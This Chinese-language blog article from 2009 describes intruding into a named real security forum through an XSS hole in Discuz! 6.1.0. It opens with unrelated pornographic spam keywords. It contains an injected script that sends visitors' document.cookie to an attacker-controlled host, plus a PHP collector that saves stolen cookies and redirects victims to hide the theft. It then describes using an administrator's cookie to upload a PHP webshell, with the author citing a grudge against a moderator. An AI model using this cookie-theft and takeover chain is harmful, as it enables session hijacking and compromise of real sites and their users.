欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

利用XSS滲透DISCUZ 6.1.0實戰(zhàn)

  發(fā)布時間:2009-04-18 12:25:55   作者:佚名   我要評論
網(wǎng)上關于XSS入侵網(wǎng)站的例子很多,但是大多都是一些惡作劇性質(zhì)的介紹.下面本人來親自介紹下利用腳本入侵國內(nèi)某安全論壇的過程 就像主題所說一樣,今天測試的論壇是DISCUZ! 6.1.0 目標:卡巴技術論壇 http://kpc

網(wǎng)上關于XSS入侵網(wǎng)站的例子很多,但是大多都是一些惡作劇性質(zhì)的介紹.下面本人來親自介紹下利用腳本入侵國內(nèi)某安全論壇的過程
就像主題所說一樣,今天測試的論壇是DISCUZ! 6.1.0

目標:卡巴技術論壇 http://kpchina.net http://bbs.kpchina.net
工具:無(感覺本人的入侵方式不是很高級,低調(diào),所以不用工具,需要的東西自己寫,都是腳本哦~!o(∩_∩)o...)

下面開始入侵:
XSS(Cross Site Scripting)攻擊,想要獲得權限就要找漏洞,大家都是知道,DISCUZ! 6.1.0 論壇有XSS漏洞,這是前人的經(jīng)驗,我不邀功

很多人只是知道有XSS漏洞可以加個alert之類的標記,但是都屬于惡作劇的范疇,實用戰(zhàn)術才是抓住入侵的關鍵,讓那些大意的編程人員和系統(tǒng)管理員能夠提高安全意識。真正具有威脅性的XSS攻擊方式就是那就是網(wǎng)上提到的竊取Cookie,Cookie是保存在本機臨時目錄,記錄本機帳戶登錄網(wǎng)站的帳戶信息,竊取它,并不能看到被竊取人的帳號和密碼,有人會問,那有什么用,我們要的只是Cookie文件,只要把具有相應網(wǎng)站權限帳號的Cookie拷貝到入侵者自己機器的臨時目錄下,覆蓋刷新那個網(wǎng)站,就能自動登錄進去,獲得其站點權限。

上面說的是思路,下面說下如何活動卡巴論壇的管理權限

要獲得卡巴技術論壇的管理員帳號的Cookie,就要在論壇里注入獲得帳號Cookie的js腳本,將Cookie以post方式提交給入侵者

如圖:

 

論壇——>入侵者布置的跨站攻擊——>轉移被入侵這視線(隱蔽)

論壇插入腳本:

var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);


但是我不一樣,因為他需要誘導人去點擊他的鏈接,但是現(xiàn)在人不是傻子,不會輕易點你的鏈接。而我是要把腳步插入論壇頁面中,這樣既隱蔽又省去了誘導的力氣
我插入的腳本如下:

**********************************************************************************************
<script language="JavaScript"> window.location.href="http://www.****.cn/upload_files/reg.php?var"+document.cookie; </script>
**********************************************************************************************


跨站攻擊腳本:
reg.php

************************************************************************************
<?php
if (isset($_GET['var'])) {
     file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));
}
?>

<script language="JavaScript"> window.location.href="http://www.ccXv.com"; </script> //轉移頁面隱蔽上面記錄cookie的操作

************************************************************************************


剩下的步驟就是等著魚自己上鉤了

當管理員帳號點入論壇某個頁面時,這個頁面卻被轉到了某新聞網(wǎng)站,其實不知,他的cookie已經(jīng)被記錄

拿這個cookie登錄論壇,(刪東西不推薦哦~~),可以臨時開啟上傳php文件,例如phpwebshell,然后再關閉,這樣你就可以很輕松的操控整個論壇站點

為什么選擇此論壇做入侵講解,很簡單,這個論壇具備了多個漏洞:
一、論壇有XSS漏洞,沒有對輸入輸出做過濾
二、論壇采用cookie方式記錄用戶信息
三、對論壇上某個版主看不慣,有點權利亂封號,不過,畢竟論壇不是那個人的,還是對管理員手下留情吧(做人要厚道?。?/p>

相關文章

最新評論